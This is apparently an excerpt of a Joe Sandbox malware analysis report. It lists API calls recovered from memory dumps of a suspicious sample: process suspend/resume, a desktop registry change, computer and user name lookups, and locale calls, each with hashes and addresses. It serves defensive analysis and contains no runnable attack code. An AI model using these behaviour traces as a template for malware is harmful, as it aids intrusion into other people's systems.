                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0210532A,00000000), ref: 0210AF33
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0210AF40
                                                  • CloseHandle.KERNEL32(00000000,?,?,0210532A,00000000), ref: 0210AF49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction ID: 80b7b1319a614f937ce3403996fefa45400bb230185fdfe7cab7ae6af8b14261
                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction Fuzzy Hash: EAD09E73509231678221176A7C0D99BEE69DFC5DB37064175F509D2265DA60884186A4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0210534F,00000000), ref: 0210AF5F
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0210AF6C
                                                  • CloseHandle.KERNEL32(00000000,?,?,0210534F,00000000), ref: 0210AF75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction ID: 2f62c7ad173faac7eb22261a21822323b53fc409d59489b32855106a583b335d
                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction Fuzzy Hash: DAD09E33508221678221176A7C4D99BEDA9DFC69B37064275F505D2561DA60D84186A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 47799c3eb4f41998aaec55d70cb5b8d5507aece2028a522da9ac79aad1f6e4cc
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 883168B6904709CFEB51CF99C880AAEBBFAFF08324F14404AD941A7615D771EA45CBA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction ID: 8fc54c86aa641a2fac74e115d7415c0e769dd0a2d918c9353c312c28b99a868a
                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction Fuzzy Hash: 3F312472940249AFCB259E78EC84EFA7BBFDF86314F0001A8F918D7251E730AA44CB50
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0210BED3
                                                    • Part of subcall function 02102939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02102948
                                                    • Part of subcall function 02102939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02102970
                                                    • Part of subcall function 02102939: RegCloseKey.ADVAPI32(004655B0,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,020F7C44,00000001), ref: 0210297B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 4127273184-27424756
                                                  • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                  • Instruction ID: 9ab671eeae67c124611c3645c435ed6476470cdacd36ee862979843014f3d557
                                                  • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                  • Instruction Fuzzy Hash: D3116D32BC421036D51834394D9BBAE2807D356B54FA1411AEB126A7C9EBDB4A9007DB
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                  • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                  • Instruction ID: fec2c544e9608d577a00c3b52852f5a5d585a465b45593d0f3e468fc148425f5
                                                  • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                  • Instruction Fuzzy Hash: DC022B72E40219AFDF15CFA9C8907AEB7B2FF48324F258269D919E7340D730A945CB90
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                  • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                  • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02142334,?,?,00000008,?,?,02145679,00000000), ref: 02142566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction ID: acc39ee96cea19e3abf7d02ca2791d5f07ca396792062634423fa470b10160cd
                                                  • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction Fuzzy Hash: 83B14C316506089FD719CF28C49ABA57BE0FF45368F298658FC9ACF2A1CB35D991CB40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                  • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction ID: 8e594b5045575f5b63b918a656837bc2aaaf6cf3b6c9f4b517d4680f63ad016d
                                                  • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction Fuzzy Hash: 2F029F3274C3108FD724DF39D951A2EB3E2BFC8754F15492DF885AB381DB74A8598A82
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 02137185
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02141375
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
                                                  • Instruction ID: 3c4607ccf3154329c90fb234f03d9cb5ffc45b0f6d42a0748ce746404669fd22
                                                  • Opcode Fuzzy Hash: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
                                                  • Instruction Fuzzy Hash: 53218372990206AFDF249B29DC41BBB77A9EB05328F10017AED0DC6980EF75D985CB50
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,02133F53,?,021416FE,00000000,?,?,?), ref: 0214101B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction ID: 3a0b336a414b4358009ba3b83213a4e882d884d409f54c89e2589b11974faa49
                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction Fuzzy Hash: 91114C372003015FDB289F39D89167AB792FF84358B14453DE94A87A40D775B843CB40
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,021412EF,00000000,00000000,?), ref: 0214157D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction ID: ff50416ce090556919ee09ff198fe30ef35b7d1fa7dc34abde54637420c522de
                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
